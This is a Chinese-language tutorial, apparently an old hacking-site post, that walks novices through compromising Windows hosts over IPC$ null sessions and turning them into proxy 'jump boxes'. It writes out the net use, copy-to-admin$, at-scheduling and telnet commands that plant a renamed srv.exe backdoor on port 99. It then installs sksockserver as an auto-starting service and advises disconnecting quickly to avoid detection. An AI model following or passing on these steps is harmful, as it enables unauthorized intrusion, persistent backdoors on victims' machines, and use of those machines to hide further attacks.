搜狗
alimama
ali
阿里
阿里妈妈
sogou
第一卷 第五章

?序:因为贴出《如何入侵能建立IPC$空衔接的主机》后,信仰2提意见说贴一些教制作跳板的,所以就有了这篇帖子:)  

前提条件:找到能建立IPC空衔接的主机,如何找到请参阅《如何入侵能建立IPC$空衔接的主机》,我的主页上也有,网址是:topcoooler.51.net  

需要工具:  

Sksockserver.exe  下载地址:http://snake12.top263.net/SkSockServer/SkSockServer1.06.zip28KB  

1:  开启CMD.EXE  ,然后在流光的目录找到SRV.EXE  (C:files.exe)将srv.exe拷到C目录,还有将sksockserver.exe也拷到C目录里,最好都改个名字,这样改了名字就没这么容易被发现了。现在就可以输入net  use  \XXX.XXX.XXX.XXX$  "密码"  /user:用户名"  ,如果成功的话将出现“命令完成”。  

(注  :NET  USE  \ip$  密码  /user:用户名字)  

2:将将SRV.EXE和sksockserver.exe拷到主机的SYSTEM32目录里。  

命令为:  C:\srv.exe  \\XXX.XXX.XXX.XXX\admin$\system32  

C:\sksockserver.exe  \\XXX.XXX.XXX.XXX\admin$\system32  

成功拷贝的话,将会出现:“已复制        1个文件”的提示。  

这个过程大概需要几分钟,等等吧:)  

3:输入  net  time  \\XXX.XXX.XXX.XXX  

这样我们就得到了主机的本地时间。  

4:输入  at  \\XXX.XXX.XXX.XXX  时间  要运行的程式  (记得时间是用主机的本地时间,一定要输入比本地时间迟几分钟!!!这样过几分钟后该程式将自动执行  ,还有  ,时间是按照国际时间的)  ,  出现添加了一项作业,其作业ID-1,就表示已经增加了作业  !!  

如果要取消作业  ,  输入  at  \XXX.XXX.XXX.XXX  ID号码  /del  

5:过几分钟  ,  输入  at  \\XXX.XXX.XXX.XXX  查看刚才要执行任务的情况  ,可以看到如下内容:  

状态  ID      日期              时间        命令行  

-----------------------------------  

    

这就表示任务已经执行了  !!  

6:现在可以输入  telnet  XXX.XXX.XXX.XXX  99  (  刚才执行的srv.exe就是用来打开99端口的)  !!很快的,我们将可以进入目标的电脑系统了:)  

这是显示为:  

C:\WINNT\system32>  

    

7:这是键入:C:\WINNT\system32>sksockserver  -install  

注意:现在不会显示你已经输入的命令文字  ,  放心  ,这是正常的  。然后按ENTER!  

8:现在来指定打开哪个端口,你可以用  1199,2001等端口,也可以按下面输入:  

C:\WINNT\system32>  

C:\WINNT\system32>sksockserver.exe  -config  port  1127  

这时屏幕显示:  

The  Port  valve  set  to  1127  

注:可以跳过以上步骤,默认端口是1813!!!  

9:这时就输入:  

C:\WINNT\system32>sksockserver  -config  starttyte  2  

屏幕显示:  

The  New  StartType  have  set  to  2  --Auto  

这样就不怕目标重新启动系统后你的跳板就停止运行  :)  

10:依照下面输入,你就拥有了自己的跳板了:)  

命令为:  

C:\WINNT\system32>  

C:\WINNT\system32>net  start  skserver  

屏幕显示:  

The  Snake  SockProxy  Service  service  is  starting.  

The  Snake  SockProxy  Service  service  was  started  successfully.  

11:现在要离开这台主机了,连接太久容易被发现嘛:)  

输入:  

net  use  \\XXX.XXX.XXX.XXX  /del  

屏幕显示:  

\\XXX.XXX.XXX.XXX  已经删除。  

你也可以检查一下,输入:  

net  use  

屏幕显示:  

会纪录新的网络连接。  

清单是空的  

(如果不是这样就说明,还连着!)  

12:打开,snake的代理跳板GUI版,就会看到属于你自己的跳板正在替你疯狂的冲浪:)  

PS:本篇文章是本人整理tekwei的《DIY  socks5》而得,如果你还不懂可以到“tekwei的主页”下载CIH版。我的主页上有他的衔接,不好意思:)是真的不记得了,我只记得:www.tekwei.org你们试试,不行的话从我网站衔接吧:)我的网址是:topcooler.51.net,上面都是菜鸟黑客教程,欢迎广大菜鸟朋友看看:)

[猫扑广告]